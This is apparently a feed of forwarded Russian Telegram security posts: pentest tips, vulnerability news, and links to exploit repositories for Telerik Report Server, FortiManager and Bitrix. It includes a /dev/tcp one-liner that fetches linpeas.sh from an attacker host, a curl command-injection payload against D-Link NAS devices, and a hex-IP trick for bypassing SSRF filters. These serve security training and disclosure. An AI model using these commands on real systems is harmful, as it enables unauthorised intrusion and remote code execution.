www.opennet.ru
Выпуск дистрибутива CachyOS 241110 с поддержкой THP Shrinker и AMD Cache Optimizer
Опубликован выпуск дистрибутива CachyOS 241110, основанного на пакетной базе Arch Linux и развиваемого в рамках непрерывной модели доставки обновлений. Дистрибутив примечателен включением оптимизаций для повышения производительности и предоставлением возможности…
🔗Ссылка:
https://opennet.ru/62220/
https://opennet.ru/62220/
Forwarded from SecuriXy.kz
Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак.
LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.
#linux #lol #upload #tips
LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.
>exec 3<>/dev/tcp/<kali-ip>/22
>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3
>cat <&3 > linpeas.sh
#linux #lol #upload #tips
Forwarded from GISCYBERTEAM
Сканер для проверки сайта Bitrix на наличие уязвимостей - Bitrix Scanner.
Этот скрипт сканирует распространенные уязвимости в Bitrix:
- открытые страницы входа в систему;
- открытые страницы регистрации;
- страницы, содержащие ошибки;
- панели администратора;
- content spoofing;
- open redirect;
- отраженный XSS;
- сохраненный XSS с помощью загрузки файла (работает только с Apache);
- SSRF.
https://github.com/k1rurk/check_bitrix
#tools #BitrixScanner #check #vulnerabilities
Этот скрипт сканирует распространенные уязвимости в Bitrix:
- открытые страницы входа в систему;
- открытые страницы регистрации;
- страницы, содержащие ошибки;
- панели администратора;
- content spoofing;
- open redirect;
- отраженный XSS;
- сохраненный XSS с помощью загрузки файла (работает только с Apache);
- SSRF.
https://github.com/k1rurk/check_bitrix
#tools #BitrixScanner #check #vulnerabilities
GitHub
GitHub - k1rurk/check_bitrix: Check bitrix vulnerabilities
Check bitrix vulnerabilities. Contribute to k1rurk/check_bitrix development by creating an account on GitHub.
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Похек
#dns #ssrf #bypass #hex
[ Оказалось способ древний, но я его увидел впервые :) ]
Все мы используем IPv4 ежедневно. Все мы используем IPv6 ежедневно. Но прямо сейчас меня удивил один парень из чата, открыв глаза, что DNS оказывается резолвит даже IP в Hex формате.
Hex IP — это представление IP-адреса в шестнадцатеричной системе. Обычно IP-адрес записывается в привычном формате с точками, например 192.168.0.1, где каждая часть — это десятичное значение байта (от 0 до 255). Однако этот же адрес можно представить в шестнадцатеричной системе.
Принцип работы:
IP-адрес состоит из 4 байтов, и каждый байт можно представить в шестнадцатеричном формате (от 00 до FF):
Десятичный IP 192.168.0.1 представлен в виде четырех байт: 192 (0xC0), 168 (0xA8), 0 (0x00), 1 (0x01).
Hex представление будет C0A801001.
Как преобразовать IP-адрес в шестнадцатеричный формат:
Возьмите каждый октет IP-адреса и переведите его в шестнадцатеричную систему.
Объедините эти значения в строку без точек.
Если вы введете URL вида http://0xC0A80001, браузер или сервер может интерпретировать это как запрос на http://192.168.0.1.
Для удобной конвертации можете использовать следующую команду:
printf '%02X' 192 168 0 1 ; echo
Получете следующий вывод:
C0A80001, подставляем 0x - hex кодhttp://0xC0A80001 и вау, оно срабатывает Собственно коллега по работе (это про тебя Андрей)), что это можно использовать при тестировании SSRF. Дальше сами фантазируйте)
Удивите и своих коллег, поделившись постом 🌝
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
#pentest #exploit
Критическая уязвимость удалённого рабочего стола
Цепочка эксплойтов для CVE-2024-4358/CVE-2024-1800
Уязвимость обхода аутентификации, отслеживаемая как CVE-2024-4358 с оценкой CVSS 9.8, позволяет создавать учётные записи администраторов без проверок. Хейрха обнаружил, что метод «Register» в «StartupController» доступен без аутентификации, что позволяет создавать учётные записи администратора сразу после завершения первоначальной настройки.
Вторая уязвимость — CVE-2024-1800 с оценкой CVSS 8.8, позволяет удалённым аутентифицированным атакующим выполнять произвольный код на уязвимых серверах. Проблема была обнаружена ранее и сообщена вендору анонимным исследователем.
Хотя эксплуатация уязвимости десериализации сложна, описание и скрипт на Python от Хейрхи делают атаку достаточно понятной для потенциальных злоумышленников. Именно поэтому организациям рекомендуется как можно скорее применить доступные обновления, т.е. обновиться до версии 10.1.24.514 или выше, которые устраняют обе уязвимости.
Критическая уязвимость удалённого рабочего стола
Цепочка эксплойтов для CVE-2024-4358/CVE-2024-1800
Уязвимость обхода аутентификации, отслеживаемая как CVE-2024-4358 с оценкой CVSS 9.8, позволяет создавать учётные записи администраторов без проверок. Хейрха обнаружил, что метод «Register» в «StartupController» доступен без аутентификации, что позволяет создавать учётные записи администратора сразу после завершения первоначальной настройки.
Вторая уязвимость — CVE-2024-1800 с оценкой CVSS 8.8, позволяет удалённым аутентифицированным атакующим выполнять произвольный код на уязвимых серверах. Проблема была обнаружена ранее и сообщена вендору анонимным исследователем.
Хотя эксплуатация уязвимости десериализации сложна, описание и скрипт на Python от Хейрхи делают атаку достаточно понятной для потенциальных злоумышленников. Именно поэтому организациям рекомендуется как можно скорее применить доступные обновления, т.е. обновиться до версии 10.1.24.514 или выше, которые устраняют обе уязвимости.
GitHub
GitHub - sinsinology/CVE-2024-4358: Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)
Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800) - sinsinology/CVE-2024-4358
❤🔥1
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Попалась на глаза python версия шарповой утилиты Seatbelt
https://github.com/0xthirteen/Carseat
#git #pentest #ad
https://github.com/0xthirteen/Carseat
#git #pentest #ad
GitHub
GitHub - 0xthirteen/Carseat: Python implementation of GhostPack's Seatbelt situational awareness tool
Python implementation of GhostPack's Seatbelt situational awareness tool - 0xthirteen/Carseat
Что-то говорят Ютуб там работает, давайте я вас спрошу 😁
Anonymous Poll
59%
Да, работает везде 🖥️📱
34%
Нет, не работает ❌
7%
Работает на телефоне 📱
🥷 Command injection в параметре
Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.
Настолько простой баг, который можно найти простым фаззингом:
#pentest #bugbounty
name для D-Link NAS Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.
Настолько простой баг, который можно найти простым фаззингом:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
#pentest #bugbounty
Forwarded from AP Security
#pentest
Вопросник с ответами для веб-пентестеров
Вопросы разного уровня сложности для оценки своего уровня.
Открывается без задержек через мобильный браузер
Вопросник с ответами для веб-пентестеров
Вопросы разного уровня сложности для оценки своего уровня.
Открывается без задержек через мобильный браузер
🔥1
Forwarded from APT
🚨 Fortinet FortiManager Unauthenticated RCE (CVE-2024-47575)
The remote code execution vulnerability in FortiManager allows attackers to perform arbitrary operations by exploiting commands via the FGFM protocol, circumventing authentication. Referred to as FortiJump, this vulnerability provides unauthorized access to FortiManager, enabling control over FortiGate devices by taking advantage of insufficient security in command handling and device registration processes.
🛠 Affected Versions:
🔗 Research:
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
🔗 Source:
https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
#fortinet #fortimanager #fgfm #unauth #rce
The remote code execution vulnerability in FortiManager allows attackers to perform arbitrary operations by exploiting commands via the FGFM protocol, circumventing authentication. Referred to as FortiJump, this vulnerability provides unauthorized access to FortiManager, enabling control over FortiGate devices by taking advantage of insufficient security in command handling and device registration processes.
🛠 Affected Versions:
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
🔗 Research:
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
🔗 Source:
https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
#fortinet #fortimanager #fgfm #unauth #rce